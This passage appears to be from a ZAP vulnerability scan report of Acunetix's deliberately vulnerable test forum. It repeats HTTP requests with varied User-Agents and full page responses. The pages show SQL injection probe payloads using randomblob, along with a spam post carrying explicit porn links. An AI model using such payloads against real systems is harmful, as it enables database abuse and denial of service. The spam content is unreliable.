erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:17 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 350 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:18 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:19 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 419 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:19 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 